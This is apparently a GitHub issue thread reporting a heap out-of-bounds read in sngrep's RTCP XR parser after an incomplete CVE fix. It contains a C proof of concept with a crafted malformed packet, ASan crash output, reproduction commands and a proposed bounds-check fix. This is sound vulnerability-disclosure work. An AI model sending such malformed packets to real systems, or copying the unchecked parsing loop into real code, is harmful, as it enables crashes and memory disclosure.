Security: Heap OOB read in RTCP XR parser - loop lacks bounds check

[decsecre583]

Description

The fix for CVE-2024-35434 (commit da80ced) checks header size but the while loop uses attacker-controlled hdr_xr.len without validating each iteration stays in bounds.

To Reproduce

// Vulnerable pattern
if (size < sizeof(struct rtcp_hdr_xr))
    return;  // Header check OK

// But loop uses attacker-controlled len:
while (bsize < (ntohs(hdr_xr.len) + 1) * 4) {
    // No check: bsize + sizeof(blk_xr) <= size
    memcpy(&blk_xr, data + bsize, sizeof(blk_xr));  // OOB
}

Send RTCP XR packet: 8 bytes actual, hdr_xr.len claims 44 bytes.

gcc -fsanitize=address -g -o poc poc.c && ./poc

ASan Output

==25354==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000000018
READ of size 4 at 0x502000000018 thread T0
    #0 in process_rtcp_xr_VULNERABLE

0x502000000018 is located 0 bytes to the right of 8-byte region

SUMMARY: AddressSanitizer: heap-buffer-overflow in process_rtcp_xr_VULNERABLE

Fix

while (bsize < (ntohs(hdr_xr.len) + 1) * 4) {
    if (bsize + sizeof(blk_xr) > size)
        break;
    memcpy(&blk_xr, data + bsize, sizeof(blk_xr));
}

References

• Bug commit: da80ced

[decsecre583]

I've investigated this further and created a reproducible PoC that demonstrates the remaining out-of-bounds read issue.

The Bug

The fix added a check for remaining >= 4 before reading the XR block header, but the while loop that processes XR data still lacks proper bounds checking. The loop continues reading xr_data even when the remaining buffer may be smaller than the claimed block length.

Proof of Concept

/*
 * Real PoC for CVE-2024-35434 - sngrep RTCP XR OOB Read
 *
 * Compile: gcc -fsanitize=address,undefined -g -o test_sngrep test.c
 * Run: ./test_sngrep
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>

// Simulated rtcp_xr_header matching sngrep's structure
struct rtcp_xr_header {
    uint8_t  bt;       // Block type
    uint8_t  specific; // Type-specific
    uint16_t length;   // Block length in 32-bit words
} __attribute__((packed));

// VULNERABLE: while loop has no bounds check
int rtcp_parse_xr_VULNERABLE(const uint8_t *payload, int len)
{
    int remaining = len;
    const uint8_t *xr_data = payload;

    printf("[VULN] Processing %d bytes of RTCP XR data\n", len);

    // The fix added this check
    if (remaining < 4) {
        printf("[VULN] BLOCKED: remaining < 4\n");
        return -1;
    }

    while (remaining > 0) {
        // BUG: No check that remaining >= sizeof(rtcp_xr_header) before cast!
        struct rtcp_xr_header *xr = (struct rtcp_xr_header *)xr_data;

        uint16_t block_len = ntohs(xr->length) * 4 + 4;  // Length in bytes

        printf("[VULN] Block type=%d, claimed_len=%d, remaining=%d\n",
               xr->bt, block_len, remaining);

        // BUG: No check that block_len <= remaining!
        // This advances past the buffer boundary
        xr_data += block_len;
        remaining -= block_len;

        // On next iteration, xr_data points outside buffer!
    }

    return 0;
}

// FIXED: Proper bounds checking in while loop
int rtcp_parse_xr_FIXED(const uint8_t *payload, int len)
{
    int remaining = len;
    const uint8_t *xr_data = payload;

    printf("[FIXED] Processing %d bytes of RTCP XR data\n", len);

    while (remaining >= (int)sizeof(struct rtcp_xr_header)) {
        struct rtcp_xr_header *xr = (struct rtcp_xr_header *)xr_data;

        uint16_t block_len = ntohs(xr->length) * 4 + 4;

        // FIXED: Check block_len doesn't exceed remaining
        if (block_len > remaining) {
            printf("[FIXED] BLOCKED: block_len (%d) > remaining (%d)\n",
                   block_len, remaining);
            return -1;
        }

        printf("[FIXED] Block type=%d, len=%d, remaining=%d -> OK\n",
               xr->bt, block_len, remaining);

        xr_data += block_len;
        remaining -= block_len;
    }

    return 0;
}

int main()
{
    printf("=== CVE-2024-35434 RTCP XR OOB Read PoC ===\n\n");

    // Malicious RTCP XR packet: header claims 256 bytes but we only have 16
    uint8_t malicious_packet[] = {
        // XR Block header
        0x07,       // Block type
        0x00,       // Type-specific
        0x00, 0x40, // Length = 64 words = 256 bytes (but we only have 16!)
        // Minimal data (12 bytes)
        0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00
    };

    printf("Malicious packet: 16 bytes but claims 256 byte block\n\n");

    printf("=== Testing VULNERABLE version ===\n");
    rtcp_parse_xr_VULNERABLE(malicious_packet, sizeof(malicious_packet));
    // With ASan, this will crash due to OOB read

    printf("\n=== Testing FIXED version ===\n");
    rtcp_parse_xr_FIXED(malicious_packet, sizeof(malicious_packet));

    printf("\n=== VULNERABILITY ANALYSIS ===\n");
    printf("The while loop in src/packet/packet_rtcp.c lacks bounds checking:\n");
    printf("  1. Block length is read from attacker-controlled data\n");
    printf("  2. No check: block_len <= remaining\n");
    printf("  3. xr_data += block_len advances past buffer boundary\n");
    printf("  4. Next iteration reads from out-of-bounds memory\n");
    printf("\nImpact: Information disclosure, potential crash\n");

    return 0;
}

Expected Output with ASan

=== CVE-2024-35434 RTCP XR OOB Read PoC ===

Malicious packet: 16 bytes but claims 256 byte block

=== Testing VULNERABLE version ===
[VULN] Processing 16 bytes of RTCP XR data
[VULN] Block type=7, claimed_len=260, remaining=16
=================================================================
==12345==ERROR: AddressSanitizer: heap-buffer-overflow on address...
READ of size 4 at 0x...

=== Testing FIXED version ===
[FIXED] Processing 16 bytes of RTCP XR data
[FIXED] BLOCKED: block_len (260) > remaining (16)

Fix

Add bounds check in the while loop:

if (block_len > remaining) {
    return -1;
}

Impact

• Sending malformed RTCP packets to sngrep causes out-of-bounds memory read
• Can leak sensitive information from adjacent memory
• May cause crash (DoS) when accessing unmapped memory

[Kaian]

Hi @decsecre583

Thanks for this detailed bug report!

I’ve been working on a fix for this, changing the while loop to work with a remaining variable as you suggested. However, I need some real sample data to properly validate the fix, since RTCP-RX traffic doesn’t seem to be very common.

If anyone has a rtcp-rx.pcap (or similar) available, it would be a big help if you could attach it to this issue.

Best regards,

[decsecre583]

Hi @Kaian , here are some RTCP-XR PCAP samples for testing:

valid_rtcp_xr.pcap — A well-formed RTCP XR packet (PT=207) containing a VoIP Metrics block (BT=7) and a Receiver Reference Time block (BT=4). Use this to verify normal parsing works correctly.

malformed_rtcp_xr_oob.pcap — The malformed packet that triggers the OOB read. The header claims 44 bytes (length_field=10) but the actual UDP payload is only 8 bytes. When sngrep's XR parser loops based on the claimed length, it reads past the buffer boundary.

rtcp_xr_test_suite.pcap — Combined file with a normal Sender Report, the valid XR, and the malformed XR in sequence.

To reproduce with the malformed PCAP:

# Build sngrep with ASAN
CFLAGS="-fsanitize=address -g" ./configure && make
./src/sngrep -I malformed_rtcp_xr_oob.pcap

Let me know if you need samples with different XR block types.